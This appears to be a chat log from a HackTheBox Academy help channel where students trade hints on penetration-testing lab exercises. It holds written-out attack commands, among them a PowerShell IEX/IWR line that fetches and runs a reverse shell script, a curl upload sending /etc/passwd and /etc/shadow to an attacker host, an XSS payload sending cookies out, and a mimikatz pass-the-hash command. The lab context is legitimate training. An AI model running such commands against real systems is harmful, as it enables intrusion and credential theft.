#modules

u can use aliases

for commands

I have a bash script in tmux which write common commands for me

In the module attacking enterprise network
For the task "Using SSRF to read local file to find the flag"

I am able to inject xss and read the /etc/passwd but not able to find or read the flag
I tried reading the /var/www/html/flag.txt but it seems the filepath is not right or file is not there

Any hints ??

What I mean is, for example:

You're using xfreerdp all the time, which takes : IP, username, password.
Either I need $IP, $user and $pass set and then I can use:
xfreerdp /v:$IP /u:$user /p:$pass

or, when I ctrl + r to get my last used xfreerdp command, I need to replace all 3 arguments, which feels very slooooow and counterproductive each time haha

u can use arsenal ig it might suites u (but not sure it has ALL commands it has a lot of commonly used ones) and i beleive u can add custome ones

its on github, check it

In any other env, I would selec the argument and start typing over basically

Thanks, will have a look!

that looks really interesting

yeah because of tmux it sits on top of the terminals so the output will get sent to whatever shell is active

so is it like a plugin from tmux to add scripts or what? im still confused on how u made it work lol

Submit the Administrator's flag from C:\Users\Administrator\Desktop ,to do this i have to import a ps module,but i can't really import modules through my terminal.This is on module Citrix Breakout

That is neat indeed

bind-key -n M-p command-prompt -p "PowerScript:" "run-shell 'bash /pt/tmux-PowerScript.sh %%'" in .tmux.conf
alt + p brings up the input and I just type whatever I want the script to do

why not

it is saying that import modules is disabled

i genuinely didnt know u can do that in tmux, thx for sharing that, much more cool stuff can be done now

you can enable it, I believe it's shown in that section

it is telling about UAC bypass,not how to import the module,mayube i am doing something wrong,dont know

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4

also something similar is used where you were looking at

Damn now wondering whether I should swap from Terminator (which I only use to easily have 6 terms on the screen) to tmux (more of a learning curve but more possibilities for sure...)

Terminator can also run shell, but not sure if it can send keys

thanks!!

i think i did it,but with a no good way.I just runned the powershell for the file explorer,with calling the function at the last line.It worked,but i think i am missing the point of the section

nvm i found the solution,thanks

Hey in the skill assesment 2 of attacking common apps is it possible to get a shell using a metasploit module for the vulnerable application??

i need help for this question....

Q5: User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them.

Module -> Introduction to Windows Command Line
Section -> Skills Assessment

This is the Hint: We want to see a full listing of the files within the hive, and then read the contents of each file. How can we see through this tree?

either recursively print out the content of all the files, or list files with size that's not 0

can you give me the command

no

That wouldn't help you if he did

Going through data in command line and extracting what you're looking for is a really useful skill

You know what the flag looks like, and you likely know both a function to print a file, and a function to look for a string in a file

Ok

I mean, just google

https://powershellfaqs.com/powershell-foreach-file-in-folder/

Hey, what is the cheapest way to get Senior Penetration Tester path ?

if its in the silver plan you could try the give-aways or winning at trivia night which should be either this friday or next friday

or a edu discount

what is edu discount ?

its if you are enrolled in school

If you talking about stundent plan I think it is not cover tier3

The cheapest option is probably a Platinum monthly subscription. This gives you 1000 cubes per month to unlock the modules.

Hello
I have a question about this task
"Using Julio's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\julio and read the file julio.txt."
Passwords attacks
section PasstheHash
when autorizing with this hashes witch command:
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:<julio hash> /domain:inlanefreight.htb /run:cmd.exe" exit
i get user ms01/administrator and i have acces do \DC01\julio
and doing the same with david i also get user ms01/administrator but now i have acces to \DC01\david
i am a little lost here

Ty

However, you will not have an exam voucher or walkthroughs in the modules. The best option is therefore probably the annual Gold subscription

whats wrong with it? you're able to access the shares of the respective users after pth

i get the answers for tasks
but iam trying to understand why it is this way

what way? you passed the hash and can access theirs shares, that's expected

yes but in both cases i have the same user sa iam a little lost why i get same user using diffrent hashes

what's the same user and how did you see it

after using mimikatz.exe i get new cmd
and i used whoami

and in both cases it says ms01/administrator

ah should've said that to being with

There was a parameter to reflect the context of the user in the newly spawned terminal

i litteraly said that in my first message😅

pth with mimikatz replaces the creds stored in memory directly, the system doesn't know that it's been changed when you run whoami

you didn't say how you got the user

ok

so for 'whoami' i still have ms01/administrator, but it got changed in memory and in reality i got respectively david and julio
yes?

not sure, cd %HOMEPATH% and see what you get.

err... or %userprofile% as a sanity check.

none of those will work

yes

understandable thanks

if you want to have a normal user shell, you can pth with rdp or winrm

ah i didnt see the above, just checking in.

hi fellas, has someone done this module, if yes can he/she share some insights please.

https://academy.hackthebox.com/module/details/267

please write the module name so people can answer more easily

MSSQL, Exchange, and SCCM Attacks

Still need help with Command Injection skill assessment. I've been throwing injection methods and filters at it for hours to no avail

Did you find the parameter?

You will know if you get an error

no, if your talking about putting input into the URL, I haven't found it

Even tried the Advanced Search feature and nothing

Have you tried all functionality like copying,moving,etc

can I dm you, I think I understand what your saying

Yes

I just finished that assessment. Did it without having to move the file. I was able to just cat it

hello

Hi

soooo how is ur day

Good, thanks. Yourself? This isn’t the channel for general chat though. If you want to chat, please verify your account via the instructions in #welcome

ok

my day is good

Glad to hear and welcome 🙏

Hi guys, do u know an easy way to connect to winrm using linux?

Evil winrm?

is there a difference?

okay whats the difference between winrm and evilwin rm 😅

I managed to connect using evil win rm

thank u

winrm is protocol for remote management
evil-winrm is tool

powershell remoting 😄

ty guys

hi why isnt this working?

what share are you trying to connect to?

or are you trying to list all the shares?

are there default shares I could connect to? It didnt really give me much info on connecting to a share...it just said crack the password and connect to it

Right so list the share first with smbclient -N -L \\\\10.129.42.253

you can list shares and see the rights you have on them either with a null auth or with user/pwd

okay thank you ill do that

Then connect to a share with smbclient \\\\10.129.42.253\\users

okay thanks, ill try that now

You can also see, what read/write permissions you have with smbmap -H 10.129.14.128 - make sure you write all this down in a command cheat sheet in obsidian, then you can always come back to it when you need it

thank you and yeah Ill write it down...I managed to get the share by the way

This! Anytime you encounter a new way to do something, write it down, and as much as possible, organize it by categories (really hard to stay on top of it)

thank u yea..I was sure I had smb written down somewhere before but apparently not...so ill write it down again

how do i list files in smb?

its giving me "NT_STATUS_ACCESS_DENIED
" for when i try ls or cd to home

@safe star Thank you for pointing me in the right direction, I was able to figure it out and get the flag

It says "try help to get a list of possible commands"

Have you tried that ?

yeah I tried "L" and it was still same issue

or l

what do you mean? What does "help" give you?

Also, do you have read rights on the share?

it gave me a list of commands I could use and how do I check if i have read rights?

waitttt

I think I was using ssh this whole time 😂

damn

In the steps that Sepulchre gave you before

its for ssh

Does anyone know how to find the hidden admin directory from "Information Gathering - Web Edition" skills assessment? I've tried a lot of wordlists with gobuster and dirbuster and I only get the index.html page 😦

delete this it's a spoiler

sorry

No worries, happens :p

you used directories wordlists ?

Yes

For the future, u need enum4linux or rpcclient to utilize that share btw

for IPC? okay ill keep in mind thank u

Another note 😄

have u looked for vhosts

DM me if you need a nudge

I'm doing a scan right now

use the 11000.txt list they used in the examples

did it finish?

Almost

guys don't post spoilers

Aha, ok I got something at the end of the scan, hope I can leverage it, thanks

Thanks man, got it

I will also pass the favor from AcroTiger and help with Windows Lateral Movement and Using CrackMapExec modules since it can be quite tricky to do both of them. Feel free to ping me. Hope this also creates an action of helping back for others aswell

I was stuck on this too.

Before you run that SystemProperitesAdvanced.exe command, you need to sign out of the target and sign back in. Then set up the shell and re run it, the command shell will be elevated.

Thanks!

does mimikatz does not run on evil-winrm session?

Why is there is a big difference in cubes, between penetration tester path and web pentrsting (7500)

Don't use the mimi session, instead use it as a one liner while using evil-winrm.

One is for an intermediate cert path, the other is an advanced cert path. The advanced cert paths are all tier 3 modules, where the other is only up to tier 2.

I am working on the nibbles machine in module 77 section 852: I have a reverse shell on the target but if i pass any commands at all, the cursor drops down a line and nothing happens. I'm copying and pasting the commands from the module into my terminal. Would anybody know why my commands wont execute?

need to see what the commands look like

python3 -c 'import pty; pty.spawn("/bin/bash")'
this is what i am trying to run after achieving the reverse shell

are you able to run anything before trying that?

No, even trying ls fails

what are you doing this on?

pwnbox?

yeah, pwnbox

reset ?

https://academy.hackthebox.com/module/77/section/852

I reset the target but not the pwnbox

No run the command reset

that yielded the same results

must be the reverse shell command then

okay let me double check that

that worked. I must have made a typo when I was using vim. Thanks for the help!

Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer. i'm trying to use getuserspn.py but with user forend but its asking for password i tried to use old password from previous section but that didn't work and i tried to use -no-pass option and this didn't work also

what does ur command look like

worked fine for me

python3 /usr/local/bin/GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

i tried to use the user sqldev and that seems to work but no sure if this is the right approach

i just used the k*** password

thats works too tho

for some reason its not working for me but i used sqldev and that worked

****Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer. ****

You're using your NIC instead of the VPN's IP

set lhsot to tun0

you're connected to the vpn, right?

yes

Anyone wanna lmk if there is gonna be an exploit dev cert by HTB?

@cloud urchinyup its work what the next

I have finished the web fuzzing module and have just come to the skills assessment part. However, I can’t find the instructions. The only thing I see in the questions section is : "After completing all steps in the assessment, you will be presented with a page that contains a flag in the format of HTB{…}. What is that flag? " I don’t see any other questions on the screen. (check screenshot) I can see from similar threads that people are talking about finding subdomains and stuff like that but I don’t see any questions regarding that. One note is I am not using the pwnbox just replicating it on my local kali linux.

get the flag?

yup

Were you asking what's next or did you get the flag?

if my sub ends can i use the modules who i have solved ti used it without sub ?

nice job. type ip a to see your adapters and you can see you set your listening host to your VPN IP

thx bro i do it

AD Enumeration & Attacks - Skills Assessment Part I. unable to crack the hash. used rockyou with hashcat. hash seems to be of multiple mode

wym multiple mode

The following 11 hash-modes match the structure of your input hash:

  # | Name                                                       | Category

======+============================================================+======================================
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
70 | md5(utf16le($pass)) | Raw Hash
2600 | md5(md5($pass)) | Raw Hash salted and/or iterated
3500 | md5(md5(md5($pass))) | Raw Hash salted and/or iterated
4400 | md5(sha1($pass)) | Raw Hash salted and/or iterated
20900 | md5(sha1($pass).md5($pass).sha1($pass)) | Raw Hash salted and/or iterated
4300 | md5(strtoupper(md5($pass))) | Raw Hash salted and/or iterated
1000 | NTLM | Operating System
9900 | Radmin2 | Operating System
8600 | Lotus Notes/Domino 5 | Enterprise Application Software (EAS)

it would most likely be an ntlm hash since youre dealing with AD

yeah but unable to crack.

dm me the hash

i personally use hashes.com to identify them, and sometimes crack if its an easy password

check

i use crackstation but neither of them showing anything

if you cant crack the hash maybe its not meant to be cracked

the question is there.

it should be cleartext

ohh i must be looking at wrong place

remove any spaces

thats the wrong domain too

you should delete the pics they aren't needed and you are spoiling

@shy cave use the .htb domain not .com

But "inlinefreight.htb" does not work. .com domain works here.

Even when using the subbrute tool

did you use dig with the target as the name server?

Yes BUT what is the question asking for? com or htb?

its asking for htb

No but how can we do that?

Ssssh

rhetorical

Review the DNS section on the footprinting module and take notes

Ok thank you

guys i'm trying to run Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid} and it takes for ever is this normal ?

Yeah, but for some reason it only appeared sometimes when I used ctrl+c to get out

Unless I’m thinking of the wrong command

Hi everyone, I'm new in this.
And I stuck with a flag by Linux Fundamentals
-Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.-

I try with this commands but I couldn't resolve it
curl https://www.inlanefreight.com | grep "https://.{0,3}.inlanefreight.com[^'"]" | sort -u | wc -l
curl -s https://www.inlanefreight.com | grep -o 'https://www.inlanefreight.com[^"]' | sort -u | wc -l
curl https://www.inlanefreight.com | grep "inlanefreight.com[^']*" | sort -u | wc -l
grep https://www.inlanefreight.com | tr “ “ “\n” | sort -u | grep -E ‘src|href’ | sort -u | wc -l

Could you help me to see what I'm doing wrong?
Thanks in advanced.

yeah it happened to me also i was waiting for like 10 mins

i'm stuck at "What is the ObjectAceType of the first right that the forend user has over the GPO Management group? " i tried to name the $sid to GPO management and enum on it but that didn't work and also tried to use get-domaingroup and find the guid and use it also that didn't it keep throwing error saying bad enumeration

Rather confused on the lateral movement section of the MSSQL Server module:
impersonated 'sa' and am executing cmds through xp_cmdshell through the link to SQL02. Did people try to pull a shell through here to read the flag? I dropped a 1-liner, checked IP and ports, hosted listener and http server and can't seem to pull the rev shell through in any reasonable way. I also tried encoding the rev shell file and calling that directly in xp_cmdshell through the link, but it is too long to run in SSMS. Is there a simpler direction..?

iex iwr a revshell script

or you can download a binary and run it

anything wrong with this ?

https://tenor.com/view/ken-jeong-community-too-small-to-read-read-reading-gif-5494204

powershell IEX(IWR http://<ip>:<port>/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell <ip> <port>

something like that

for some reason I'm still getting unable to connect despite an http server being active.

strange question but, should I be able to connect to the htb academy boxes even if im not connected to vpn? Im doing the LFI module

yes normal

some of them are running in docker and exposed to the internet , some of them you need vpn

some modules doesnt spawn a machine on the network, but spawn a public docker containers

Ok thanks guys

u can recognize it from the IP:PORT syntax, and not just an IP that is 10.129.xx.xx

Yeah I did notice it didnt conform with the other IP's. Thanks

I was working on HTB : Forest, trying out bloodhound with sharphound both as of a latest version but cannot upload the sharphound zip in the blood hound, upon further analysis i found out that the problem is in the incompatibility,

Which version of sharphound is compatible with latest Bloodhound 4.3.1??

hey guys currently on the cpts academy "Passwd, Shadow & Opasswd" currently struggling is any one cool to help ?

what module? 😅

Password Attacks

ok so whats the problem ur facing?

hol on ..

so i tried to curl -X POST https://MY-IP/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure on the target yet i got curl: (26) Failed to open/read local data from file/application kira@nix01:/home/will/.backups

i hope it makes sense

i tried getting the shadow.bak on the .backups dir still doesent work i tried it all

you're trying to upload the actual passwd and shadow file, not the backups

wait sorry i forgot to be more detailed i meant that the shadow.bak was in the .backups dir

yes but that's not what your command did

yeah specifically i did curl -X POST https://my-ip/upload 'files=@/.backups/shadow' --insecure on the taget

-F ?

/.backups/shadow

how does linkux file paths work

yeah that will take him to /

use the full path

or curl -X POST https://my-ip/upload -F 'files=/home/will/.backups/shadow' --insecure

yeah smh it gave me bad req ..

<!DOCTYPE HTML>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code: 400</p>
<p>Message: No files selected.</p>
<p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
</body>
</html>

No files selected

make sure the permission and the path of file are correct

brah ..

i was in /.backups/shadow.bak' dir

/.backups is not the right path

yeah but thats where the shadow.bak file is located

nah it's not

use the full path

kira@nix01:/home/will/.backups$ ls -la
total 16
drwxrwxr-x 2 will will 4096 Feb 9 2022 .
drwxr-xr-x 3 will will 4096 Feb 9 2022 ..
-rw-r--r-- 1 will will 2619 Feb 9 2022 passwd.bak
-rw-r----- 1 will will 1724 Feb 9 2022 shadow.bak
kira@nix01:/home/will/.backups$

ok but its it in /.backups or /home/will/.backup?

/home/will/.backups

dude /home/will/.backup and /.backups are not the same thing

yeah i know i js wish i could drop a screen shot here

#welcome

Does anyone see anything wrong here? MSSQL Lateral Movement section - can't pull the shell through. Tested without the MSSQL link and I can do it just fine, but through the link as 'sa' the base64 encoded command exceeds the char limit

unable to connect to the remote server

yes but I don't understand what the issue exactly is regarding that, can execute commands on SQL02, just can't pull a shell. I also tried various ports in case it was firewalled 🤷‍♂️

works for me

isn't this only from ||SQL01 to kali?|| Trying to do it through the Link to SQL02

then you need to pivot

Is this the intended route?

if you want a revshell

The question prompt just states to use the techniques in the section to print the flag 🤷‍♂️ and the techniques are executing cmds across sql links. I guess a shell is not necessarily needed

I love how I can't complete the htb introduction because I can't start a new instance because I terminated it

yeah if you just want to get the flag a proper shell is not needed, but if you wanna run things like potato you'd probably need one

I settled for the flag for now 🙂 got it, thanks for the ConPtyShell tip though that's a useful one

Can anyone give me a nudge on the Abusing HTTP Misconfigurations hard skills assessment?

Having trouble having admin user to trigger the XSS
Edit:
ok I solved this challenge. For people who might run into the same problem, I needed to NOT include "withCredentials" in my payload.

can I DM?

can you link the section? i might have done this one

https://academy.hackthebox.com/module/189/section/2025

ah, no i havent done that one, thought it was a diff one.

sorry fren, @spring lily

all g mate

AD Enumeration & Attacks - Skills Assessment Part I. any hints for getting to dc. iam able to get Ad********* hash , sv***** creds, and t***** hash. Ad******* is unable to access dc using evil-winrm

did you get the answer for the second last question

iam stuck on 3rd last question. unable to get t***** pass. only have hash for it

dump things in the host you have admin on

hello

Anyone done the Windows Event Logs & Finding Evil module?

https://academy.hackthebox.com/module/216/section/2303

Im wondering how this can be of any real use beyond very basic understanding of the cmds/tools (specifically the cmd line stuff) due to the verbosity of each tool, and the differing syntax of each... should you just learn what you can and move on? im having trouble finding the major need to learn some of this stuff as compared to like Sysmon, ElasticSearch/Kibana, and some of the other (seemingly?) more useful stuff in the SOC path

i dumped and got the hash of t***** user. as well as s***** user creds. through which i got A******** hash too. Am i missing something?

Hey guys can you tell me why on my first scan i didn't saw the open ports 8081 and 8888 but well the 2181 and on the second scan i saw the 8081, 8888 port but not the 2181?

not sure who the A user is but yes, dump things and you'll find the cleartext cred

Your fast scan is using syn stealth and only the top 100 ports. Your all ports is using tcp connect. Refer to the map documentation as your answers are there.

Administrator

ah that's just the local account

This isn't a specific module, but I am trying to figure out how to get a file in exploits.

I am on meterpreter, and I have the exploit found in another tab. I basically just want to cp the .txt to a directory so I can upload

But its not as simple as cp /my exploit /home

Where is the exploit? Web page or a program on your machine, or remote?

in shells and payloads in The Live Engagement task, how are we supposed to get the creds for the apache tomcat manager page without using the hint?

I don't think that its the problem just tried with -sS and -sT and there i see the 8000 ports but not the 2181 port and all those port are in the most used ports file of nmap but when i do a -p- then i can see the 2181 but not the 8000 ports also if the default scan is in SYN (stealth) scan (when using -p- its also SYN

Syn stealth requires sudo

Nvm that was lazy. It was in the /opt/exploits-database, thank you though

Haha no worries

how is that possiblee syn stealth is deault scan no when you don't select another one? Like if i do nmap -sC -sV <tarrget> it use syn stealth as default or im i wrong? Just saw it on the documentaton i think. I mean if i don't set tg-he -sS option then i don't need to use sudo its just default?

SYN scan may be requested by passing the -sS option to Nmap. It requires raw-packet privileges, and is the default TCP scan when they are available. So when running Nmap as root or Administrator,

check the foothold desktop

It's an informal test thing I am doing, where things aren't doing what they are supposed to. For instance, I can't actually run the script I uploaded because ./ isn't working. 😦

yeah just saw it my bad but i'm still with the problem why with -sS and -sT i see the 8000 + ports but not the 2181 (knowing its in the top 1000 default port scanning file) but when i do a -O it just show the 2181 and not the 8000+ ports haha but give me a sec im trying a new -O scan to see what the result will be maybe it was just bad timing or something

thanks

So now I have to find a way to get a privesc script running on a crontab, when ./ won't run it.

Can you be more explicit with "./" won't run it?

Did you give it exec rights?

Yep it was a 777

But the actual .sh won't run

What's the language of the script ?

bash ?

Yep

What's the console shell ?

Linux? I'm in meterpreter.

Try looking at the shebang and then run it as "sh <script.sh>" or "bash <script.sh>"

It is /bin/sh

Aaah, any chance you can try outside meterpreter? Drop a shell from it?

Oh I'm in one of those gross like, non shell things

Like init 2 where I get 0 feedback

Now can you upgrade to a better shell?
python3 -c 'import pty; pty.spawn("/bin/bash")'

Also -F is top 100 not 1,000

Okay I can maneuver a bit, but there was a syntax error, of an unexpected "("

I'm so done lmao

In your script?

Yes lmao

Time to read some code :p

-.-

Also, if it's a bash script, it might be easier to look at what it does and just run the steps

Since that's anyway what the console will do

Yeah I'll try copy/paste from another terminal maybe

(as well as give you a thorough understanding of the exploit)

Fair point

again you rigt but the -p- just gave me the 2181 and not the other but im gonna forget about it haah the scan is tanking to much time

Good luck @sweet patrol I'm logging out!

Again that's the difference between running a tcp connect vs syn stealth. sudo nmap -p- will give you both sets of ports. There's other things you can do to speed up your scan like not checking for DNS or using faster timeouts.

Hello
I have a problem with Passwords atatcks module section Pass the Ticket (PtT) from Linux
Command from module just dont work in machine

is that the right keytab to use

How can i specyfi keytab in this case?
in module it wash straight, command and results

set the KRB5CCNAME env variable

anyone free for a nudge on the last question of DACL Attacks II skills assessment?

sure

hello guys,privsec windows,i am stuck really in this question 'Find the password for the ldapadmin account somewhere on the system. '

Any hint?i really dont know what and where to search,i can't find in files

anyone has any idea why enum4linux and enum4linux-ng show different results ? Like enum4linux show things enum4linux-ng does not, and enum4linux-ng shows things enum4linux does not show

use the password hunting techqniues they showed you and pay attention to any interesting files

like what

enum4linux regular one finds all local users, for example enum4linux-ng does not

not sure, they are a little different tho, maybe its the RID recycle feature

yeah the rid rycle thing seems to find the additional users on enum4linux

dont know what the flag is on ng but I think it has one

found it
-R [BULK_SIZE] Enumerate users via RID cycling. Optionally, specifies lookup request size.

thanks, much appreciated

Passwords atatcks module section Pass the Ticket (PtT) from Linux
How can i transfer ccache file from Linux01 to my attack host when onli connection to it i have is via port forwarding
i have to transer file to windows host and from there to my host or is it better solution
also seems to cut my forwardec SSHconnection whet i enter RDP

i really cant find it...i dont know what to do really

hmmm let me check what I did on that question

it's hard to give a nudge without giving too much info on this one

how can i solve the problem if the targes doesn't support pass auth

?

basically think about ||all the tools they showed you that hunt passwords automatically, tools which show many results especially for elevated users||

iirc you don't have to transfer anything, you can just do it in the remote host

is it port 22?

yeah

the password isn't supported at all so...

is it supposed to be? what's the target that you're given

if you read the chat above, i'm not answering to you lol

WEX101@htb feels like talking about my local host

LOL nvm

you sure?

This also strongly suggest transfering😅

yes that module is before password attacks in the path

come on.

what section

i solve it

but in the question it says ssh

so i thought directly about 22

those ips usually want you to use one port

Yes and i did that one
but still dont understand how schould i do thins without transfering stuff

matter of fact i tried it b4 but the ip wasn't spawned so i thought it's because of the port

then try to transfer stuff

anyway thanks a lot for helping me

so we get back to my first question how to transfer stuff to my host from host i have acces to only via port forwarded SSH

you can just transfer it to that linux host

or reverse port forwarding but that is in a later module

i need to get it from that linux host to my host

you don't

use that ticket in the linux host

how
i just to green i dont understand what you mean
onyl i know is secion want me to export it to env on my local host
so in my mind i need to transfer it to my host

you can run the same command in the linux host

if it's just a ccache file it doesn't matter where you're using it from

Ad enumeration and attack skill assessment 1. Iam not able to get user tp**** clear text pass. All i got is the hash. And its not cracking. I dumped sam of both web01 and ms01 machines and still cant find clear text pass

you won't be able to crack the hash. there's another registry hive you should check other than sam

*in addition to, as you need both

ok i ll check it again 😦

i rage quit the box 🤣

Ok
related but diffrent
why when i rdp to the host 10.129.120.251
it seems to cut the port forwarding ssh conection on 10.129.120.251:2222

I don't know tbh, ssh port forwarding is pretty stable

ok can you give me some more info or steps to do
module say to transfer it but doesn't say how
you say i don't have to
i am really lost and like 5h deep in this particular section feeling like lost child

you can come back to that later, i didnt know about pivoting or port fowarding back then and skipped it

its optional for a reason

I thought i need this to answer this

you don't have to transfer to your own kali host, but you need to transfer it to the linux host that you ssh into

there's no reverse port forwarding needed, just a direct transfer

ok so where can i get LINUX01$ Kerberos ticket

checked all security, system and sam. ntds.dit need dc access (that i dont have)

you've missed it then, check again on ms01

... you'll have to find it, that's part of the question

ok
so everything from this port forwarding stuff is related to bonus questions?

Module: Linux Privilege Escalation
Section: Linux Local Privilege Escalation - Skills Assessment
Link to section: https://academy.hackthebox.com/module/51/section/480

I managed to solve all the questions. I'm actually trying to find a way to obtain a shell on the box without the credentials provided, as they mentioned there is a way. I've had little to no luck, so if someone's been able to do this, can you please DM me? (Just need a nudge in the right direction)

check open ports

After long i dont know how i menage to did it
thx @next bronze for your help and patience

Thanks for the nudge. I thought it'd be a web vector so I've been trying different web attacks 😂

think dumber

This always seems to be the answer. Gotta always remember to KISS I guess 😂

Hi

Why i dont have permission to talk on the other topics?

I have a problem
Who can help me

#welcome

With what

Are there cyber security specialists in this group?

What do you need help with

I want to learn but I don't know where to start. Can you help?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Do I have to enter the link?

If you wish to learn, yes

Is it safe?

Yes

You can also google it

Ok thank you bro

he is a mod, yes it's safe 🙂

Is there an Arab person here?

There are people here from all over the world

I'm not good at English and I'm new here

Hello guys i have a question, right now i doing the academy module of ffuf, and i have a question about speed responses for requests over DNS, currently i can use ffuf over DNS and goes fastly, but i am looking to my friend screen and i see the same command but with a slow responses with the same DNS ffuf command, so i am not sure but i think can be the openvpn connection, can be some openvpnv configuration more fastly than others ?, we are currently in the same country

he only have that issue with the DNS ffuf, if he use vhos fuzzing works propertly fast

Is there a fast reliable way to perform a full port scan with nmap? I don't want to increase the min packet rate cuz afraid of packet loss and missing the port or using the -T flag. Or is that just the trade off for performing the scan faster? Full port scans always take a lot of time.

Who can help me? I want a free virtual phone number.

T4 is generally fine and I have ~200 ping to the targets

but for this one you don't need to do the full port scan

just focuse on the stuff on port 80

I think you are on the wrong server

👀

Oh, so I was doing the right thing. I didn't find a vector tho...

Yup 😂😭

it's not a vulnerability, click around the page and see what you can find

But if you can help me pls

I was trying Blind XSS against the Form, but other than that, nothing really caught my attention.

Please read the #rules

Ok sorry

this is the linux privesc skill assessment?

Yeah, tryna find the way to get a shell.

It's a lot and I don't understand anything in English if you can summarize pls

yeah it's not a vuln, click around the links

you can use a translator

Ohh, that's what you meant by not a vuln, I'll just explore then.

I feel that this is not my place, as I am very new to the field and I want to learn , sorry

just seeking clarification, I have completed the information gathering skills assessment, but my box timed out before I could type up my notes for question: After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb - we use the reconspider tool given to us in the documentation to get the email, I remember doing it but can't remember my steps. thanks

No one here will give you direct answers, best to go over the steps again, seems like you have most of the notes to quickly do it.

are you sure its port 80?

wasn't looking for the direct answer, I Have it, I am just trying to remember my POC steps to replicate it but its cool I will hunt. Unfortunately it isn't in my history either

Look at it as a frustrating life lesson? Setup logging for your terminal, or configure tmux, that way it wont happen again.

I went through the pages, clicked around, checked the page sources' href links as well for all the pags I could find. Still came up with nothing. Are you sure it's just through browsing that I'll find the way to get a shell? No vulns? 🤔

check other ports

I guess I'll wait for that full port scan to finish. And I'll checkout the other port again.

you should be able to find it instantly

plus u can use netstat

Huh?

How can I use netstat when I'm not on the target machine?

linux privilege escalation?

he's trying to do it withouth the creds

I've already solved the questions. At the top of the page, they mentioned in a note that there's a way to get a foothold on the machine, without the SSH creds they gave.

ahh ok

yes

yep you don't need to exploit anything

it's a subdomain on the page

There's one subdomain I came across but it didn't load.

make it load then

Oh, wait... was I supposed to add it to /etc/hosts 💀

i was wondering how to get www-data, never knew about this way

just got it

Got stuck loading after logging in, poor connection I'm guessing 😭 😂

Finally in.

I done the right thing but for some reason it required me to be root and not run sudo, when I ran it that way results.json would return blank. I get why you didn't give the nudge as it has everything in there. thanks for the tough love haha

it worked with sudo this time, must have been me doing something wrong thanks

Bro iam unable to find it. i made backup of system, security and sam. And both sam and security does not have any info on tpetty. running mimikatz gave hash only.

Was having some connectivity issues but finally managed to get the shell. I was overcomplicating things way too much. Thanks @next bronze

Hello I wanna be a hacker how can I begin I dk anything more then the average user but I’m ready too start learning ik it’s gonna be a long path but I am hungry too get on the right path

I’ve just joined and can’t seem too message anywhere else

the password is there

you're looking for a cleartext password

going back through my notes on this, is that you did that one? I did it a different way.

there are multiple ways?

unless a cat dumped all over my notes is wrong ¯_(ツ)_/¯

look up Information Security Foundations role path on htb academy

Ok I’m on htb academy now do you think it’s a good place too learn too be a hacker because it looks pretty good or do u recommend something else

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

It seems like it will guide me step by step which is why I like it

Also you don't be a "hacker"
you be a security specialist

@rustic sage

Awesome thank you man

got the password. now figuring out how to access this user. as evil-winrm etc are not working

working on interrogating network traffic with capture and display filters. I need help utlizing TCPDump-lab-2.zip. I seem to be unlable to locate through my pawnbox. I have tried locate both the zip file and optional resources. I have tried verations of WGET and the academy.hackthebox.com web address to try and get the zip file, but nothing seems to work. I can down load my file to my home computer but that does not help me when I try to get it from my spawn Instance (or Pawnbox). can someone help me?

Go through the module, this skill test covers just about all of it, there's a lot to link together

on the desktop of the pwnbox there are creds, ssh is open on it, you can scp the files over.

Yeah will be going through it tommo. Done for the day, that damn secret was too much effort. Missed it too many times

thank you I will try it

what is new on the updated login brute forcing?

the custom wordlists part has a lab now and some extra stuff

Session Hijacking is not working for me: https://academy.hackthebox.com/module/103/section/1008 Im not getting the cookie to my php server

using the script.js?

It's a full re-write so the whole module.

yea

did you properly close the script tag?

I think yes

need to see what the payload looks like

new Image().src='http://myip/index.php?c='+document.cookie;

ofc I edited the my ip part to my vpn ip

show with the script tags

looks fine there tho

This one ? <script src=http://MYIP/script.js></script>

that looks fine too

Yea it seems a lot of ppl stuck on this module

did you add any filter bypassing

you might have the wrong input field then

I checked and I got connection back with netcat

lemme check

The vuln field is the last one

i got the cookie

lol

try restarting

yea and mayb I change port too

@safe star I found the problem

It was the port you have to change it from 80 to another one. (for me it worked)

i was on 80

Idk why not worked on 80 for me

are u on pwnbox?

I was on pwn not worked and switched to vm and it didn't worked as well

Ty for helping me if there is some kind of karma system let me know.

im doing dcsync section and i'm trying to ssh to the linux machine from ms01 but that doesn't work any idea why ?

how do i anonymous login like it shows in the module? it keeps asking for password and not working "smbclient //10.129.220.19/sambashare"
Password for [WORKGROUP/DOMAIN\aesliex]:

what module

footprinting , SMB

is that the right share?

or you just censored it

yep, when i put it in "What is the name of the accessible share on the target?" question it was right

you should be able to just put an empty password and get in

$smbclient //10.129.220.19/sambashare
Password for [WORKGROUP/DOMAIN\aesliex]:
Try "help" to get a list of possible commands.
smb: >

says this

whats the problem

-N

you're in

Is the anonymous login option

ohh lol

type help to see what commands you can use

like ls

the help text made me think im doing sum wrong

tyty

I think it is called null login or something

still stuck

already finished it using windows method i just wanted to do it also in linux method to see how it works

I have been stuck on Attacking LSASS section of HTB Academy module for a week or so now and I think I could get through it and understand it but I am having anxiety about other things while reading it due to mental health issues. Does anyone know if someone could walk me through it possibly if this continues because I don't want to spend six weeks on question 2 of Attacking LSASS

